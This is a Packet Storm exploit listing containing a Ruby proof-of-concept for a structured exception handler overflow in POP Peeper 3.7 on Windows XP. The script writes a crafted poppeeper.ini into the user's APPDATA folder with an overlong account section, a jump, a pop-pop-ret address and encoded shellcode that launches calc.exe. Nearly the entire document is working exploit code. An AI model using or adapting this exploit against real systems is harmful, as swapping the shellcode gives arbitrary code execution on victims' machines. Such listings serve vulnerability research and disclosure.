POP Peeper 3.7 SEH Overflow

2011-03-18T00:00:00
ID PACKETSTORM:99470
Type packetstorm
Reporter Anastasios Monachos
Modified 2011-03-18T00:00:00

Description

                                        
                                            `#!/usr/bin/ruby  
#############################################################################  
# Title: POP Peeper 3.7 SEH Exploit  
# Tested on: Windows XP SP2 EN  
# Target: POP Peeper 3.7.0.0  
# Download Link: http://www.poppeeper.com/download.php  
# Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com  
# Greetz: offsec team, inj3ct0r team  
#############################################################################  
appdata = ENV['APPDATA']  
file = appdata +"\\POP Peeper\\poppeeper.ini"  
f = open(file, "wb")  
eb = "\xeb\x06\x90\x90"  
ppr = "\x67\x15\xD3\x74" #Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)  
#Spawn calc.exe, bad characters: \x00\x0a\x0d  
shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +  
"\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +  
"\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +  
"\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +  
"\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +  
"\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +  
"\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +  
"\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +  
"\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +  
"\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +  
"\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +  
"\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +  
"\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +  
"\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +  
"\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +  
"\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +  
"\xca\xd5\x1e")  
  
f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")  
f.close()  
  
`